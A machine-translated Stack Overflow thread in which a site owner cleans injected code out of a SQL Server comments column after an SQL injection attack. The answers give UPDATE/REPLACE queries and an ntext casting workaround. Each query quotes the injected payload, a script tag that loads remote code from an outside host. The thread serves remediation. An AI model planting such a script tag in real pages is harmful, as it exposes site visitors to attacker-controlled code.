0
我主持的網站最近是SQL注入的,我想找到一種方法從數據庫中的特定列(註釋)中刪除有問題的注入代碼。使用SQL Server 2008,我不知道這是爲什麼不工作:從表列刪除部分文本
USE Dirty
SELECT REPLACE(comments,'</title><script src=http://hjfghj.com/r.php ></script>','')
FROM SALONS
A
回答
3
你只是選擇 - 不更新....
試試這個:
USE Dirty
UPDATE dbo.Salons
SET Comments = REPLACE(comments,'</title><script src=http://hjfghj.com/r.php ></script>','')
WHERE (possibly a condition here...)
+1
打我4秒! – msmucker0527 2012-03-08 21:48:25
+0
得到:Msg 8116,Level 16,State 1,Line 3 參數數據類型ntext對替換函數的參數1無效。 – user547794 2012-03-08 21:50:12
+1
您應該使用nvarchar(max)而不是ntext作爲列時間。 (請參閱http://msdn.microsoft.com/en-us/library/ms187993.aspx)根據您處理ntext列的方式,您可能必須更改相當多的代碼,但這將是值得的。 – 2012-03-08 22:33:24
2
你實際上沒有更新任何東西,只是選擇它。您需要創建更新聲明
USE Dirty
UPDATE SALONS
SET comments = REPLACE(comments,'</title><script src=http://hjfghj.com/r.php ></script>','')
+0
我收到了:消息8116,級別16,狀態1,行3 參數數據類型ntext對於替換函數的參數1無效。 – user547794 2012-03-08 21:51:03
-1
因爲列是導致錯誤的「ntext」。我設法解決這個使用像這樣的演員:
USE Dirty
UPDATE dbo.Salons
SET Comments = cast(replace(cast(comments as varchar(8000)),'</title><script src=http://hjfghj.com/r.php ></script>','') as ntext)
+0
如果你這樣做 - 確保轉換爲'NVARCHAR(MAX)'!!!!否則,您將您的評論限制爲8000個字符,並且您將它們轉換回非Unicode! – 2012-03-09 05:55:07
相關問題
- 1. jquery部分刪除文本
- 2. ListDeleteValue - 刪除列表的一部分
- 3. C# - 刪除部分列表框項目
- 4. sed刪除文本的不同部分
- 5. 刪除jQuery中的部分文本
- 6. LINUX從文件中刪除文本部分與sed基於
- 7. C++從列表中部刪除節點
- 8. 從尾部刪除的鏈接列表
- 9. 從URL中刪除部分
- 10. 從twitter部件中刪除文本框
- 11. 從文本部件中刪除內容
- 12. 刪除SQL列中的分隔文本
- 13. 在SQL Server中刪除行列中的部分文本
- 14. 從列表項中刪除分號
- 15. 刪除部分文件名
- 16. 刪除部分文件名
- 17. 從視圖列表中刪除頂部分隔符?
- 18. 從沒有唯一列的表中刪除部分重複項
- 19. 通過jQuery從部分文本中刪除冒號?
- 20. 從bash腳本中刪除du輸出的文件部分
- 21. 從部分字符串中刪除文本
- 22. 如何從iOS Swift 3中的餅圖部分刪除文本?
- 23. SQL查詢刪除整個表中的文本部分
- 24. 用於刪除部分xml文件的UWP列表選擇器
- 25. 刪除部分
- 26. 刪除部分
- 27. 刪除部分
- 28. 刪除部分
- 29. 刪除部分
- 30. 刪除部分
什麼** datatype **是'評論'?? – 2012-03-08 21:46:25